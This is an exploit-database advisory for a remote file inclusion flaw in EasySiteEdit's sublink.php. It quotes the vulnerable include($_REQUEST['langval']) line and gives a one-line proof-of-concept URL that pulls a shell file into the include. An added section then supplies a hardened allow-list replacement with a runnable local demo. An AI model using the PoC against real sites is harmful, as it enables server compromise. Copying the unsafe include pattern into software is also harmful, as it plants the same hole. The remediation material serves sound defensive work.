EasySiteEdit Remote File Inclusion Vulnerability

2011-08-21T00:00:00
ID 1337DAY-ID-16742
Type zdt
Reporter koskesh jakesh
Modified 2011-08-21T00:00:00

Description

Exploit for PHP platform in category web applications

                                        
# Exploit Title: EasySiteEdit remote file include
# Date:2011
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat
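
The reported line passes `$_REQUEST['langval']` directly to `include`. The following is an added example of a hardened replacement, not code from EasySiteEdit or from the advisory's author; the language codes, the `lang/` directory layout and the function name `resolve_lang_file` are assumptions made for illustration.

```php
<?php
// Added example; not EasySiteEdit code. LANG_ALLOWED, LANG_DEFAULT and the
// directory layout are hypothetical.
const LANG_ALLOWED = ['en', 'de', 'fr'];
const LANG_DEFAULT = 'en';

/**
 * Map the untrusted request value to a path built only from server-side
 * constants. The request value selects an entry; it never becomes a path.
 */
function resolve_lang_file($requested, string $langDir): string
{
    // Arrays (langval[]=x), unknown codes and anything path-like fall back.
    if (!is_string($requested) || !in_array($requested, LANG_ALLOWED, true)) {
        $requested = LANG_DEFAULT;
    }
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $requested . '.php');
    // realpath() resolves symlinks; confirm the result is still inside $base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $path;
}

// Vulnerable form reported in sublink.php, line 20:
//     include($_REQUEST['langval']);
// Hardened call site would be:
//     include resolve_lang_file($_GET['langval'] ?? LANG_DEFAULT, __DIR__ . '/lang');

// Constructed demo: build a throwaway lang directory so this runs offline.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
@mkdir($dir);
foreach (LANG_ALLOWED as $code) {
    file_put_contents("$dir/$code.php", "<?php return ['lang' => '$code'];");
}
// Constructed inputs: one valid code, the value from the advisory, an
// unknown code, and an array parameter.
foreach (['de', 'shell.txt?', 'xx', ['x']] as $value) {
    $strings = include resolve_lang_file($value, $dir);
    printf("%-16s -> %s\n", json_encode($value), $strings['lang']);
}
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

Keeping `allow_url_include` set to `Off` in php.ini blocks the remote-URL variant only; inclusion of local files through the same parameter is closed by not passing request data to `include` at all.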



#  0day.today [2018-04-05]  #